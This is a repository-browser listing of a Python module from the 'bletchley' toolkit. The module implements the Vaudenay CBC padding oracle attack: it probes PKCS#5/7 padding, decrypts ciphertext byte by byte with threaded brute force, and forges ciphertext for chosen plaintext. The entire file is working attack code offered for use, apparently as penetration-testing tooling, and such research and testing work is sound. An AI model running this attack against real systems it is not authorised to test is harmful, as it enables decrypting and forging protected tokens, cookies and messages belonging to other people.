source: lib/bletchley/CBC/POA.py @ 16

Last change on this file since 16 was 16, checked in by tmorgan, 12 years ago

renaming packages/modules

File size: 9.5 KB
Line 
1'''
2Created on Jul 4, 2010
3
4Copyright (C) 2010 ELOI SANFÈLIX
5Copyright (C) 2012 Timothy D. Morgan
6@author: Eloi Sanfelix < eloi AT limited-entropy.com >
7@author: Timothy D. Morgan < tmorgan {a} vsecurity . com >
8
9 This program is free software: you can redistribute it and/or modify
10 it under the terms of the GNU Lesser General Public License, version 3,
11 as published by the Free Software Foundation.
12
13 This program is distributed in the hope that it will be useful,
14 but WITHOUT ANY WARRANTY; without even the implied warranty of
15 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
16 GNU General Public License for more details.
17
18 You should have received a copy of the GNU General Public License
19 along with this program.  If not, see <http://www.gnu.org/licenses/>.
20'''
21
22import random
23import struct
24import threading
25from .. import buffertools
26from .Exceptions import *
27
28class DecryptionOracle:
29    '''
30    This class implements a decryption oracle based on a given padding oracle.
31    The attacked padding scheme is the one defined in PKCS#5 and RFC2040, and maybe other places.
32    The attack was first described in the "Security Flaws Induced by CBC Padding. Applications to SSL, IPSEC, WTLS... by Serge Vaudenay"
33    '''
34
35    _thread_result = None
36    _oracle = None
37    _ciphertext = None
38    _iv = None
39    _decrypted = None
40    max_threads = None
41    log_fh = None
42   
43    def __init__(self, oracle, block_size, ciphertext, iv=None, max_threads=1, log_file=None):
44        '''
45        Creates a new DecryptionOracle object. Receives an oracle function which returns True
46        if the given ciphertext results in a correct padding and False otherwise. A second
47        parameter defining the cipher block size in bytes is also supported (default is 8).
48        '''
49        if(len(ciphertext)%block_size != 0 or len(ciphertext) < block_size):
50            raise InvalidBlockError(block_size,len(ciphertext))
51        if(iv != None and len(iv)%block_size != 0):
52            raise InvalidBlockError(block_size,len(iv))
53
54        self._oracle = oracle
55        self._block_size = block_size
56        self._ciphertext = ciphertext
57        self._iv = iv
58        self._decrypted = ''
59        self.max_threads = max_threads
60        self.log_fh = log_file
61
62
63    def log_message(self, s):
64        if self.log_fh != None:
65            self.log_fh.write(s+'\n')
66
67
68    def probe_padding(self, prior, final):
69        '''
70        Attempts to verify that a CBC padding oracle exists and then determines the
71        pad value.  Returns the pad string, or None on failure.
72        XXX: Currently only works for PKCS 5/7.
73        '''
74        ret_val = None
75        # First probe for beginning of pad
76        for i in range(0-self._block_size,0):
77            if i == -1:
78                break
79            tweaked = struct.unpack("B", prior[i])[0] ^ 0xFF
80            tweaked = struct.pack("B", tweaked)
81            if not self._oracle(self._ciphertext+prior[:i]+tweaked+prior[i+1:]+final):
82                break
83
84        pad_length = 0-i
85        self.log_message("Testing suspected pad length: %d" % pad_length)
86        if pad_length > 1:
87            # Verify suspected pad length by changing last pad byte to 1
88            # and making sure the padding succeeds
89            tweaked = struct.unpack("B", prior[-1])[0] ^ (pad_length^1)
90            tweaked = struct.pack("B", tweaked)
91            if self._oracle(self._ciphertext+prior[:-1]+tweaked+final):
92                ret_val = buffertools.pkcs7Pad(pad_length)
93
94        else:
95            # Verify by changing pad byte to 2 and brute-force changing
96            # second-to-last byte to 2 as well
97            tweaked = struct.unpack("B", prior[-1])[0] ^ (2^1)
98            tweaked = struct.pack("B", tweaked)
99            for j in range(1,256):
100                guess = struct.unpack("B", prior[-2])[0] ^ j
101                guess = struct.pack("B", guess)
102                if self._oracle(self._ciphertext+prior[:-2]+guess+tweaked+final):
103                    # XXX: Save the decrypted byte for later
104                    ret_val = buffertools.pkcs7Pad(pad_length)
105
106        if ret_val:
107            self._decrypted = ret_val
108
109        return ret_val
110
111
112    # XXX: This could be generalized as a byte probe utility for a variety of attacks
113    def _test_value_set(self, prefix, suffix, value_set):
114        for b in value_set:
115            if self._thread_result != None:
116                # Stop if another thread found the result
117                break
118            if self._oracle(str(prefix+struct.pack("B",b)+suffix)):
119                self._thread_result = b
120                break
121
122
123    def decrypt_next_byte(self, prior, block, known_bytes):
124        '''
125        Given some known final bytes, decrypts the next byte using the padding oracle.
126        prior -
127        block -
128        known_bytes -
129        '''
130        if(len(block)!=self._block_size):
131            raise InvalidBlockError
132        numKnownBytes = len(known_bytes)
133       
134        if(numKnownBytes >= self._block_size):
135            return known_bytes
136       
137        prior_prefix = prior[0:self._block_size-numKnownBytes-1]
138        base = ord(prior[self._block_size-numKnownBytes-1])
139        # Adjust known bytes to appear as a PKCS 7 pad
140        suffix = [0]*numKnownBytes
141        for i in range(0,numKnownBytes):
142            suffix[i] ^= ord(prior[0-numKnownBytes+i])^ord(known_bytes[i])^(numKnownBytes+1)
143        suffix = struct.pack("B"*len(suffix),*suffix)+block
144
145        # Each thread spawned searches a subset of the next byte's
146        # 256 possible values
147        self._thread_result = None
148        threads = []
149        for i in range(0,self.max_threads):
150            t = threading.Thread(target=self._test_value_set, 
151                                 args=(self._ciphertext+prior_prefix, suffix, range(i,256,self.max_threads)))
152            t.start()
153            threads.append(t)
154           
155        for t in threads:
156            t.join()
157       
158        if self._thread_result == None:
159            raise Exception
160
161        decrypted = struct.pack("B",self._thread_result^base^(numKnownBytes+1))
162        self._decrypted = decrypted + self._decrypted
163        #  Return previous bytes together with current byte
164        return decrypted+known_bytes
165   
166
167    def decrypt_block(self, prior, block, last_bytes=''):
168        '''
169        Decrypts the block of ciphertext provided as a parameter.
170        '''
171        while(len(last_bytes)!=self._block_size):
172            last_bytes = self.decrypt_next_byte(prior, block, last_bytes)
173        return last_bytes
174
175
176    # XXX: Enable recovery in case of intermittent failure by storing state of
177    #      partial decryption on object
178    # XXX: Add option to strip padding from message
179    def decrypt(self):
180        '''
181        Decrypts a message using CBC mode. If the IV is not provided, it assumes a null IV.
182        '''
183        blocks = buffertools.splitBuffer(self._ciphertext, self._block_size)
184
185        final = blocks[-1]
186        iv = self._iv
187        if iv == None:
188            iv = '\x00'*self._block_size
189        if len(blocks) == 1:
190            # If only one block present, then try to use IV as prior
191            prior = iv
192        else:
193            prior = blocks[-2]
194
195        # Decrypt last block, starting with padding (quicker to decrypt)
196        pad_bytes = self.probe_padding(prior, final)
197        decrypted = self.decrypt_block(prior, final, pad_bytes)
198        print(repr(decrypted))
199
200        # Now decrypt all other blocks except first block
201        for i in range(len(blocks)-2, 0, -1):
202            decrypted = self.decrypt_block(blocks[i-1], blocks[i]) + decrypted
203
204        # Finally decrypt first block
205        decrypted = self.decrypt_block(iv, blocks[0]) + decrypted
206       
207        return decrypted
208
209
210    def encrypt_block(self, plaintext, ciphertext):
211        if len(plaintext) != self._block_size or len(plaintext) != len(ciphertext):
212            raise InvalidBlockError(self._block_size,len(plaintext))
213
214        ptext = self.decrypt_block('\x00'*self._block_size, ciphertext)
215        prior = buffertools.xorBuffers(ptext, plaintext)
216        return prior,ciphertext
217   
218   
219    # XXX: Add option to encrypt only the last N blocks.  Supplying a shorter
220    #      plaintext and subsequent concatenation can easily achieve this as well...
221    def encrypt(self,plaintext):
222        blocks = buffertools.splitBuffer(buffertools.pkcs7PadBuffer(plaintext, self._block_size), 
223                                         self._block_size)
224
225        if (len(self._decrypted) >= self._block_size
226            and len(self._ciphertext) >= 2*self._block_size):
227            # If possible, reuse work from prior decryption efforts on original
228            # message for last block
229            old_prior = self._ciphertext[0-self._block_size*2:0-self._block_size]
230            final_plaintext = self._decrypted[0-self._block_size:]
231            prior = buffertools.xorBuffers(old_prior,
232                                           buffertools.xorBuffers(final_plaintext, blocks[-1]))
233            ciphertext = self._ciphertext[0-self._block_size:]
234        else:
235            # Otherwise, select a random last block and generate the prior block
236            ciphertext = struct.pack("B"*self._block_size, 
237                                     *[random.getrandbits(8) for i in range(self._block_size)])
238            prior,ciphertext = self.encrypt_block(blocks[-1], ciphertext)
239
240        # Continue generating all prior blocks
241        for i in range(len(blocks)-2, -1, -1):
242            prior,cblock = self.encrypt_block(blocks[i],prior)
243            ciphertext = cblock+ciphertext
244       
245        # prior as IV
246        return str(prior),str(ciphertext)
Note: See TracBrowser for help on using the repository browser.